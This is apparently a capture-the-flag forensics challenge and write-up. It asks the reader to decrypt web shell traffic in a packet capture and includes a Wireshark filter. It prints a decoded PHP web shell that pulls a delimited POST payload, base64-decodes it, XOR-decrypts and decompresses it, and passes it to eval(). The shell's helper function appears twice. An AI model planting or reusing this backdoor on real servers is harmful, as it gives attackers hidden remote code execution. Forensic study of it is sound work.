DESCRIPTION
You have to investigate recent attack on your web server. Since attackers were very skilled, they used specially designed PHP shell to access the server. Your friends from Incident Response Department managed to get network capture file with malicious traffic. Secret flag, which attackers used, is in PCAP file. All evidences (including php shell code) are here: http://10.195.165.94/forensics/shell_code.zip
QUESTION
Can you decrypt web shell command responses?
// Decoded shellcode
<?php function x($t, $k) {
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0;$i < $l;) {
for ($j = 0;($j < $c && $i < $l);$j++, $i++) {
$o.= $t{$i} ^ $k{$j};
}
}
return $o;
}
$k = "4696bd9a";
$kh = "8ecf79155df0";
$kf = "5fb97fdc8317";
$p = "BL450mL1WeCi9eMA";
function x($t, $k) {
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0;$i < $l;) {
for ($j = 0;($j < $c && $i < $l);$j++, $i++) {
$o.= $t{$i} ^ $k{$j};
}
}
return $o;
}
if (@preg_match("/$kh(.+)$kf/", @file_get_contents("php://input"), $m) == 1) {
@ob_start();
eval(@gzuncompress(@x(base64_decode($m[1]), $k)));
$o = @ob_get_contents();
@ob_end_clean();
$r = @base64_encode(@x(@gzcompress($o), $k));
print ("$p$kh$r$kf");
}
PHP
Algorithm description:
•
Take post input
•
Substring, starting with 8ecf79155df0 ending with 5fb97fdc8317
•
Everything in-between will be:
•
base64 decoded
•
XOR decoded
•
GZIP uncompressed
•
then evaled
tcp contains '8ecf79155df0' and http.method == 'POST'
Shell
See on essencially see chall: https://joshuanatan.medium.com/hack-bfc7c6528463